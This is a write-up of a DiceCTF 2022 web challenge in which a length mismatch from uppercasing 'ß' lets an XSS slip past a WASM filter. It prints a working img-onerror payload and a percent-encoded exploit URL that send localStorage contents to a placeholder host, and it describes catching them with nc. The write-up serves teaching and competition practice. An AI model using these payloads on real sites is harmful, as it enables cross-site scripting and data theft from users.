DiceCTF 2022 (Web, 140 pts)

Last weekend Galhacktic Trendsetters sort of spontaneously decided to do DiceCTF 2022, months or years after most of us had done another CTF. It was a lot of fun and we placed 6th!

I made a blazing fast MoCkInG CaSe converter!

We’re presented with a website that converts text to AlTeRnAtInG CaSe. The core converter is written in WASM, and also checks that its input doesn’t have any of the characters <>&". The JavaScript wrapper takes an input from the URL, converts it to uppercase, feeds it to the converter, and if the check passes, injects the output into the page via innerHTML. The goal is to compose a URL that, when visited by an admin bot, leaks the flag from localStorage.

The converter is compiled from this C code:

The most important part of the site’s JavaScript is as follows:

An overview of the logic:

  1. First, the JavaScript passes the input’s length into the converter and checks that that length is at most 1000.
  2. Then, it converts the input with toUpperCase and writes it character by character into the converter, checking that none of those characters has a character code greater than 128.
  3. Next, it calls the converter, which converts the case of the first length chars of its buffer, as well as checking for XSS.
  4. Finally, the JavaScript reads the output back until it sees a null byte, and injects that into innerHTML.
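
The four steps above can be modeled in plain JavaScript. This is a rough sketch for following the logic, not the challenge's actual C or JavaScript source: the names makeConverter and demo, the 4096-byte buffer, and the rejection strings are all assumptions made for illustration.

```javascript
// Hypothetical model of the converter: a zero-filled buffer, a stored
// length, and a read/write pointer.
function makeConverter() {
  const buf = new Uint8Array(4096); // assumed size; zero-filled, so reads end at a null byte
  let length = 0;
  let ptr = 0;
  return {
    init(n) { length = n; ptr = 0; },
    write(code) { buf[ptr++] = code; },
    read() { return buf[ptr++]; },
    // Case-converts and checks only the first `length` bytes of the buffer.
    mock() {
      for (let i = 0; i < length; i++) {
        if (i % 2 === 1 && buf[i] >= 65 && buf[i] <= 90) buf[i] += 32; // lowercase odd positions
        if ('<>&"'.includes(String.fromCharCode(buf[i]))) return 1;    // forbidden character
      }
      ptr = 0;
      return 0;
    },
  };
}

// Hypothetical model of the JavaScript wrapper (steps 1 to 4).
function demo(str) {
  const conv = makeConverter();
  conv.init(str.length);                       // step 1: length of the ORIGINAL string
  if (str.length > 1000) return "rejected: too long";
  for (const c of str.toUpperCase()) {         // step 2: write the UPPERCASED string
    if (c.charCodeAt(0) > 128) return "rejected: non-ASCII";
    conv.write(c.charCodeAt(0));
  }
  if (conv.mock() === 1) return "rejected: forbidden character"; // step 3
  let out = "";                                // step 4: read until a null byte
  for (let b = conv.read(); b !== 0; b = conv.read()) out += String.fromCharCode(b);
  return out;
}
```

In this model, demo("hello") yields "HeLlO", while any input containing < within its first str.length uppercased characters is rejected.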

Although an innerHTML injection is very powerful, we can’t directly inject any HTML tags because the converter checks for <. We need to get around this check somehow. The handling of the input and output’s length, and in particular the way the output is read until a null byte, is quite suspicious: the string that we compute the length of and the string that we eventually write aren’t the same.

And indeed, the core exploit in this challenge is that converting a string to uppercase does not preserve its length. The simplest example, and the one I used, is U+00DF “ß”, the German eszett, which is one character but gets uppercased into two, “SS”; conveniently, both of them are ASCII characters. There are a few other examples; I think SpecialCasing.txt from the Unicode Character Database is the authoritative source. (Notably, U+FB03 “ﬃ” and U+FB04 “ﬄ” each get uppercased into three letters, which gives us more room to write our exploit if we want it, as I explain below.)
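
The length change is easy to check in any JavaScript console. The snippet below is a small illustration; the variable names are arbitrary.

```javascript
// Characters whose uppercase form is longer than the original, plus "a"
// as a control that keeps its length.
const examples = ["ß", "\uFB03", "\uFB04", "a"];

const growth = examples.map((ch) => ({
  upper: ch.toUpperCase(),
  before: ch.length,
  after: ch.toUpperCase().length,
}));

for (const row of growth) {
  console.log(`${row.before} -> ${row.after}: ${row.upper}`);
}
```

Each of the first three entries is a single UTF-16 code unit before uppercasing and two or three ASCII letters afterwards.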

What a character like this enables us to do is: if we pad our input with many ß’s at the beginning, then the length received by the converter will be much shorter than the “true length” of the uppercased string that the converter eventually receives. The converter will then only check for the XSS characters in the first length characters (while case-converting them). However, because the JS wrapper reads until it sees a null byte, it will read the entire string back out. So we can sneak an XSS in the part after the first length characters.
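
To see where the boundary falls, here is a minimal sketch that splits the uppercased input into the part the converter checks and the tail it never looks at. The helper splitChecked is hypothetical and only mirrors the description above: the length is taken before uppercasing, while the buffer receives the uppercased string.

```javascript
// Hypothetical helper mirroring the length mismatch.
function splitChecked(input) {
  const checkedLength = input.length;   // length reported to the converter
  const written = input.toUpperCase();  // what is actually written to the buffer
  return {
    checked: written.slice(0, checkedLength),
    unchecked: written.slice(checkedLength),
  };
}

const payload = "<IMG SRC=X>";
// One ß per payload character is enough to push the whole payload past the check.
const input = "ß".repeat(payload.length) + payload;
const { checked, unchecked } = splitChecked(input);

console.log(checked);   // only the S's produced by the padding
console.log(unchecked); // the payload, untouched
```

With fewer ß's than payload characters, the start of the payload would still fall inside the checked region.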

There were a few more complications, all of them relatively minor, but they still took me an hour or two to sort out. One of them was the rather newbie realization that I had never actually set up a public-facing web server to exfiltrate a flag from a CTF before. (The only other CTF challenge I’ve done involving exfiltration from a browser, Cat Chat, provided its own exfiltration mechanism.) But I do have a cheap Linode server now, so I copy-pasted one of my nginx config lines to reverse proxy a path to a specific port and ran nc -l on that port as needed.

The next complication is that a <script> tag injected via innerHTML does not execute. This is so well-documented that it appears in MDN’s docs for innerHTML. Happily, that page also includes an alternative exploit that does work: <img src='x' onerror='code'>.

However, there is a final overlapping complication: our XSS gets passed through .toUpperCase(), so it can’t contain any lowercase letters! If the <script> exploit had worked, we could have sourced an external JavaScript file whose URL doesn’t contain lowercase letters. However, the <img onerror> exploit requires us to write JavaScript inline, which is a bit more painful. I did find a writeup of an Intigriti Challenge by Amal Murali that mentioned an <iframe srcdoc> exploit along these lines:

Unfortunately, although this exploit worked “locally” for me, it didn’t when I pasted it into the bot.

I got stuck here for a bit. I tried for a while to write an exploit without any lowercase letters; I knew it was possible à la JSFuck, but I wasn’t sure if I could also satisfy the length constraint of about 500 characters (which could have become 666 if I had known about ﬃ or ﬄ). But eventually I talked to my teammates, and cesium pointed out that I could replace every lowercase letter in my exploit with an ampersand escape (a “character reference”), which would get unescaped when the string was injected into innerHTML and parsed as an attribute value.
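
Both halves of this paragraph can be sketched in a few lines. The helpers escapeLowercase and maxPayloadLength are hypothetical names, and the input limit of 1000 is taken from step 1 of the overview; the real cutoff may differ by one.

```javascript
// Replace each lowercase ASCII letter with a decimal character reference.
// The result contains no lowercase letters, so toUpperCase leaves it alone.
function escapeLowercase(js) {
  return js.replace(/[a-z]/g, (ch) => `&#${ch.charCodeAt(0)};`);
}

// Longest payload that fits when each padding character expands to
// `expansion` characters and the whole input may be at most `limit` long.
// The padding must add at least as many extra characters as the payload has.
function maxPayloadLength(expansion, limit) {
  let best = 0;
  for (let p = 0; p <= limit; p++) {
    const padding = Math.ceil(p / (expansion - 1));
    if (padding + p <= limit) best = p;
  }
  return best;
}

const html =
  `<IMG SRC=X ONERROR='fetch("HTTPS://EXAMPLE.COM/"+localStorage.getItem("flag"))'>`;
const escaped = escapeLowercase(html);

console.log(escaped.length, maxPayloadLength(2, 1000), maxPayloadLength(3, 1000));
```

Under these assumptions the budget is 500 characters with ß and 666 with ﬃ or ﬄ, and the escaped payload fits comfortably in either.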

As a final tiny obstacle, it took some effort to percent-encode everything properly. While for many Unicode characters you can get percent-encoding for free by pasting them into a browser’s URL bar and then copying them out again, both the & and the # in the ampersand escape have other meanings in URLs and need to be manually encoded, as does + because URLSearchParams parses it as a space.
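
One way to avoid encoding by hand is encodeURIComponent, which escapes &, # and + along with non-ASCII characters. The sketch below round-trips a short sample through the URL parser; the host challenge.example and the parameter name demo are placeholders, not necessarily what the challenge uses.

```javascript
const raw = "ß&#102;+1";                 // padding, a character reference, and a plus sign
const encoded = encodeURIComponent(raw); // "%C3%9F%26%23102%3B%2B1"

const base = "https://challenge.example/?demo="; // hypothetical URL and parameter name

// Unencoded: & ends the parameter and # starts the fragment, so the value is cut short.
const naive = new URL(base + raw).searchParams.get("demo");

// Encoded: the full string comes back out of URLSearchParams.
const roundTrip = new URL(base + encoded).searchParams.get("demo");

console.log(naive, roundTrip);
```

encodeURIComponent also escapes the semicolons, which is harmless here since they decode back to the same characters.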

In any case, we no longer have any restrictions and can just write straightforward JavaScript and then escape it. If we take <IMG SRC=X ONERROR='fetch("HTTPS://EXAMPLE.COM/"+localStorage.getItem("flag"))'>, prepend lots of ß’s, and encode properly, we end up with a final working exploit (replace EXAMPLE.COM with your exfiltration website):

;%26%23105;%26%23110;%26%23100;%26%23111;%26%23119;.%26%23102;%26%23101;%26%23116;%26%2399;%26%23104;(%27HTTPS://EXAMPLE.COM/%27%2B%26%23108;%26%23111;%26%2399;%26%2397;%26%23108;S%26%23116;%26%23111;%26%23114;%26%2397;%26%23103;%26%23101;.%26%23103;%26%23101;%26%23116;I%26%23116;%26%23101;%26%23109;(%27%26%23102;%26%23108;%26%2397;%26%23103;%27));%22%3E

[Screenshot: nc -l 1337 outputting a GET request with the flag. Caption: Leaking the flag from my cheap Linode server.]

For my own reference next time, seems to be a popular tool for free exfiltration endpoints. And maybe ngrok offers a bit more flexibility for a bit more setup, but still doesn’t require setting up a server.

Appendix: The no-lowercase-letters strategy

After solving this challenge and becoming stuck on everything else, I went back and finished the JSFuck approach of writing an exploit without any lowercase letters. The character limit was not as harsh as I feared, since I had a full uppercase alphabet of variables, and adapting bits and pieces of the JSFuck source code was fairly intuitive.

Here’s a lightly commented version of the JavaScript without any lowercase letters I ended up with that will exfiltrate the flag from localStorage:

The exploit can be produced in the same way: putting it in <img src=x onerror='...'> and padding with ß’s. After deleting all the comments and whitespace, the code above is about 330 characters, and there are many ways to shave a few more off (renaming CTR, replacing most ""s with a variable… there was actually no need to go through [][F+L+A+T] to get a function when (_=>_) would have sufficed), so there’s plenty of room to spare.
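
As a small illustration of the general trick (not the exploit described above), lowercase strings can be recovered from coerced values such as !1+"" and !0+"" and stored in uppercase variables. The source string below is a made-up example; it is run through an indirect eval so that the undeclared assignments work in sloppy mode, since var and let are themselves lowercase.

```javascript
// Source code containing no lowercase letters.
// !1+"" is "false" and !0+"" is "true"; destructuring picks out single letters.
const src = '[F,A,L,S,E]=!1+"";[T,R,U]=!0+"";F+L+A+T';

// toUpperCase leaves such code unchanged, which is the whole point.
const survives = src === src.toUpperCase();

// Indirect eval runs the string as global, non-strict code and returns
// the value of its last expression.
const built = (0, eval)(src);

console.log(survives, built); // the letters f, l, a, t joined together
```

From there, a string like the one built here can be used as a property name, as in the [][F+L+A+T] lookup mentioned above.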

After the CTF, I was somewhat relieved to see that Smitop’s writeup also took this approach, which means I wasn’t the only one who didn’t think of using ampersand escapes.
